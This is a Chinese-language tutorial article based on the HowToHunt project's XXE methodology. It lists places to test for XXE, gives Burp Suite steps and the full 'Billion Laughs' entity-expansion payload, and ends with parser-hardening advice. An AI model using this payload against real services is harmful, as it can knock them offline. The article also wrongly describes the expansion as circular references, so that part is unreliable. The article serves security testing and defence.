HowToHunt XXE安全研究：十亿次测试与防护策略

XML外部实体（XXE）安全问题是Web安全中一个需要重视的方面，可能导致信息泄露、服务端请求伪造和拒绝服务。本文将为你详细解析XXE安全问题的测试方法，特别是著名的"十亿次测试"（Billion Laughs Test），并提供实用的防护策略。🚀

【免费下载链接】HowToHunt Collection of methodology and test case for various web vulnerabilities. 项目地址: https://gitcode.com/gh_mirrors/ho/HowToHunt

什么是XXE安全问题？

XXE（XML External Entity）安全问题发生在应用程序解析XML输入时，允许引用外部实体。当XML解析器配置不当，允许处理外部实体时，测试者就能够读取文件、执行远程请求，甚至进行拒绝服务测试。

XXE安全问题的常见测试场景

根据HowToHunt项目的XXE方法论，以下是几种常见的测试场景：

1. 内容类型转换测试

将请求的Content-Type从"application/json"或"application/x-www-form-urlencoded"转换为"application/xml"，尝试利用XML解析功能。

2. 文件上传测试

当应用程序允许上传docx、xlsx、pdf、zip等文件格式时，可以解压这些文件包，在XML文件中添加测试代码。

3. SVG图片测试

如果网站允许上传SVG图片，可以在SVG文件中添加XML代码，因为SVG本质上也是基于XML的格式。

4. RSS订阅测试

对于提供RSS订阅功能的Web应用，可以将测试代码添加到RSS订阅中。

5. SOAP API测试

针对仍在运行SOAP API的应用程序，可以寻找注入点进行测试。

6. SSO集成测试

当目标Web应用允许SSO集成时，可以在SAML请求/响应中添加XML测试代码。

十亿次测试（Billion Laughs Test）详解

十亿次测试是一种利用XML实体解析机制进行的资源消耗测试。它通过实体之间的循环引用，在解析过程中消耗大量CPU资源，用于验证系统的健壮性。

测试原理

测试者定义多个XML实体，每个实体都引用前一个实体，形成指数级增长的实体扩展链。当XML解析器处理这些实体时，会不断递归解析，最终消耗大量系统资源。

测试步骤

1. 使用Burp Suite捕获目标请求
2. 发送到Repeater标签并将请求体转换为XML格式
3. 确认Accept头信息，将其改为application/json
4. 如果没有可能性，将JSON转换为XML
5. 在XML字段中添加测试载荷，根据资源消耗测试变体调整lol1到lol9

典型测试载荷

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

实用的XXE安全防护策略

1. 禁用外部实体处理

在XML解析器中明确禁用外部实体处理，这是最有效的防护措施。

2. 使用安全的XML解析器

选择默认禁用外部实体处理的XML解析器，或者配置解析器不处理外部实体。

3. 输入验证和过滤

对用户输入的XML数据进行严格的验证和过滤，移除或转义潜在的不安全内容。

4. 实施内容安全策略

限制可接受的XML结构和实体定义，只允许必要的XML模式。

5. 定期安全测试

使用自动化工具和手动测试相结合的方式，定期检查应用程序是否存在XXE安全问题。

总结

XXE安全问题虽然看似复杂，但只要掌握了基本的测试原理和防护方法，就能够有效保护Web应用程序的安全。记住，安全是一个持续的过程，需要不断地学习、测试和改进。💪

通过HowToHunt项目提供的XXE方法论，安全研究人员和开发人员能够更好地理解这一安全问题的特性，并采取相应的防护措施。

【免费下载链接】HowToHunt Collection of methodology and test case for various web vulnerabilities. 项目地址: https://gitcode.com/gh_mirrors/ho/HowToHunt